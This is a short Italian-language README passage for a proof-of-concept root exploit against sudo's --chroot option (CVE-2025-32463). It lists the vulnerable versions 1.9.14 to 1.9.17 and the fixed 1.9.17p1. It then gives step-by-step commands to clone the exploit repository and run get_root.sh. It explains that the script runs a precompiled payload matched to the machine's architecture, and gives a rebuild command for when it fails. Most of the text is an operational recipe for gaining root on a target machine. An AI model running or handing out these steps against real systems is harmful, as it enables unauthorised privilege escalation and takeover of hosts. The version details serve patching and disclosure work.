
- Vulnerabile: sudo 1.9.14, 1.9.15, 1.9.16, 1.9.17 - Corretto in: sudo 1.9.17p1 e versioni successive - Le versioni legacy precedenti alla 1.9.14 non sono interessate, poiché non supportano l'opzione --chroot.
# get_root.sh e get_root.py fanno la stessa cosa.
git clone https://github.com/shazed-x/CVE-2025-32463
cd CVE-2025-32463
./get_root.sh
Non è richiesto gcc sulla macchina di destinazione. Il PoC funziona verificando l'architettura corrente (ad es., x86_64, aarch64), quindi esegue il payload pre-compilato dinamicamente corrispondente. Se questo fallisce, ripiega su quello statico.
Se l'exploit fallisce sulla tua macchina, puoi comunque compilarlo usando:
./mkall-dynamic.sh
# poi esegui
./get_root.sh